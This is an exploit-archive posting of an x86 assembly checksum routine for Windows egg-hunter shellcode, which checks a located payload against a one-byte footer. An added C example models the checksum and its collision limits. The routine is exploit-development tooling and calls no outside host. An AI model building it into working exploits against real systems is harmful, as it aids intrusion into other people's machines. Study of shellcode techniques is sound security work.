win32/xp Checksum Routine shellcode 122 bytes
=============================================
win32/xp Checksum Routine shellcode 122 bytes
=============================================
;Exploit Title: Shellcode Checksum Routine
;Date: Sept 1 2010
;Author: dijital1
;Software Link: http://www.ciphermonk.net/code/exploits/shellcode-checksum.asm
;Tested on: Omelet Hunter Shellcode in MSF
;"|------------------------------------------------------------------|"
;"|                 (Corelan Team ASCII-art banner)                  |"
;"|                 http://www.corelan.be:8800                       |"
;"|                 security@corelan.be                              |"
;"|-----------------------------------------------[ EIP Hunters ]--|"
;"          -= Egg Hunter Checksum Routine - dijital1 =-            "
[BITS 32]
;Author: Ron Henry - dijital1
;Email: rlh@ciphermonk.net
;Site: http://www.ciphermonk.net
;Greetz to Exploit-db and Team Corelan
;Ok... a couple of assumptions with this code. First, we're using a single
;byte as the checksum, which gives us a 1 in 256 or ~0.39% chance of a
;collision (a random block of memory passes the check with that probability;
;an additive sum also cannot tell apart bytes that were merely reordered).
;We consider this a worthwhile risk given the overall size of the code: 18 bytes.
;There are a couple of ways to implement this, but a good example is how it
;was used in Peter Van Eeckhoutte's omelet egghunter mixin that was recently
;added to the Metasploit Framework.
;We're using a 1 byte footer at the end of the shellcode that contains the
;checksum generated at shellcode creation. The footer byte itself is not
;part of the sum; it sits at offset egg_size, one past the last byte summed.
; Variables eax: accumulator (only al is used; carries are discarded)
;           edx: points to the start of the candidate egg; [edx+ecx] is the current byte
;           ecx: counter
egg_size equ 0x7a             ;we're testing 122 bytes in this instance
find_egg:                     ;in the full hunter this label is the search loop that
                              ;advances edx; on its own it only resets the registers
    xor ecx, ecx              ;zero the counter
    xor eax, eax              ;zero the accumulator
calc_chksum_loop:
    add al, byte [edx+ecx]    ;add the byte to the running total (mod 256)
    inc ecx                   ;increment the counter
    cmp cl, egg_size          ;compare counter to egg_size
    jnz calc_chksum_loop      ;if it's not equal, repeat
test_chksum:
    cmp al, byte [edx+ecx]    ;compare al with the 1 byte checksum footer at [edx+egg_size]
    jnz find_egg              ;search for another egg if the checksum is bogus
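As an added worked example (this is not part of dijital1's listing or of the Metasploit mixin), the C below models the same scheme end to end: the generator side that computes the footer byte at shellcode creation, and a verifier that mirrors the assembly loop (byte-wise add into al with carries dropped, then compare against the byte at offset egg_size). The function names and the sample egg bytes are constructed for illustration; the sample is a short byte pattern, not real shellcode, and egg_size is passed as a parameter rather than fixed at 0x7a. The two demo functions show the caveats from the comments above: a single flipped byte is caught, while swapping two bytes is not, because an additive checksum is order-blind.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Same arithmetic as the asm loop: "add al, byte [edx+ecx]" over egg_size
 * bytes with al starting at 0. Carries fall off al, so this is the sum mod 256. */
uint8_t egg_checksum(const uint8_t *egg, size_t egg_size)
{
    uint8_t al = 0;                              /* xor eax, eax */
    for (size_t ecx = 0; ecx < egg_size; ecx++)  /* inc ecx / cmp cl, egg_size */
        al = (uint8_t)(al + egg[ecx]);           /* add al, [edx+ecx] */
    return al;
}

/* Generator side ("at shellcode creation"): copy the egg and append the
 * one-byte footer. out must have room for egg_size + 1 bytes. Returns the
 * total payload length. */
size_t append_footer(const uint8_t *egg, size_t egg_size, uint8_t *out)
{
    memcpy(out, egg, egg_size);
    out[egg_size] = egg_checksum(egg, egg_size);  /* footer is not summed */
    return egg_size + 1;
}

/* Mirror of test_chksum: once ecx == egg_size, compare al with [edx+ecx].
 * Returns 1 if the candidate passes, 0 if the hunter should keep searching. */
int egg_footer_ok(const uint8_t *candidate, size_t egg_size)
{
    return egg_checksum(candidate, egg_size) == candidate[egg_size];
}

/* Constructed sample egg (not real shellcode): a NOP-like pattern. */
static const uint8_t sample_egg[8] = {
    0x90, 0x90, 0x90, 0x90, 0x31, 0xC0, 0x50, 0xC3
};
#define SAMPLE_EGG_SIZE (sizeof sample_egg)

/* A one-bit corruption of a summed byte changes the sum, so it is caught.
 * Returns 1 when the verifier correctly rejects the damaged copy. */
int demo_corruption_detected(void)
{
    uint8_t payload[SAMPLE_EGG_SIZE + 1];
    append_footer(sample_egg, SAMPLE_EGG_SIZE, payload);
    payload[2] ^= 0x01;                          /* simulate a bad copy in memory */
    return egg_footer_ok(payload, SAMPLE_EGG_SIZE) == 0;
}

/* Swapping two bytes leaves the sum unchanged, so the check still passes.
 * Returns 1 when the verifier (wrongly, but as designed) accepts the swap. */
int demo_swap_undetected(void)
{
    uint8_t payload[SAMPLE_EGG_SIZE + 1], t;
    append_footer(sample_egg, SAMPLE_EGG_SIZE, payload);
    t = payload[4]; payload[4] = payload[5]; payload[5] = t;
    return egg_footer_ok(payload, SAMPLE_EGG_SIZE) == 1;
}

int main(void)
{
    uint8_t payload[SAMPLE_EGG_SIZE + 1];
    size_t n = append_footer(sample_egg, SAMPLE_EGG_SIZE, payload);
    printf("payload length %zu, footer byte 0x%02x, verify=%d\n",
           n, payload[SAMPLE_EGG_SIZE], egg_footer_ok(payload, SAMPLE_EGG_SIZE));
    printf("corruption detected: %d, swap undetected: %d\n",
           demo_corruption_detected(), demo_swap_undetected());
    return 0;
}
```

When integrating the real routine, the only inputs that matter are that edx points at the first summed byte and that the footer was computed over exactly egg_size bytes with the same wraparound arithmetic; an off-by-one in either place makes every genuine egg fail and the hunter scan forever.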
Source: http://inj3ct0r.com/exploits/13959